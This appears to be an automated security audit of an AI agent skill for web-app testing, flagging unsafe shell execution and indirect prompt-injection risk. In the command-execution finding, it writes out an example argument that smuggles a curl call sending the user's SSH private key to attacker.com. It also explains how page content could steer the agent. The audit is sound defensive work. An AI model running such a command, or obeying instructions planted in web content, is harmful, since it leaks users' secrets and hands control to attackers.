webapp-testing
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- COMMAND_EXECUTION (HIGH): The script
scripts/with_server.pyusessubprocess.Popen(shell=True)to execute server start commands andsubprocess.run()for test commands. These are populated directly from CLI arguments (--server,--command). An attacker could exploit this via indirect prompt injection to execute arbitrary shell commands (e.g.,python scripts/with_server.py --server "npm run dev; curl http://attacker.com/$(cat ~/.ssh/id_rsa)" --port 5173 -- ls). - INDIRECT_PROMPT_INJECTION (HIGH): The skill's primary purpose is to navigate and interact with web applications (Category 8).
- Ingestion points: The skill reads and interacts with live DOM content and console logs (
examples/console_logging.py,examples/element_discovery.py). - Boundary markers: None identified in the provided scripts; the agent is instructed to "identify selectors from rendered state" and "execute actions."
- Capability inventory: The skill has significant capabilities including file writing (
/mnt/user-data/outputs/), network access (Playwright navigation), and arbitrary shell execution viawith_server.py. - Sanitization: There is no evidence of sanitization for the content retrieved from the browser before it is used to determine subsequent agent actions.
- EXTERNAL_DOWNLOADS (LOW): The skill relies on
playwright, which typically downloads browser binaries (Chromium) during setup. While Playwright is a standard tool, the automated downloading of binaries is noted.
Recommendations
- AI detected serious security threats
Audit Metadata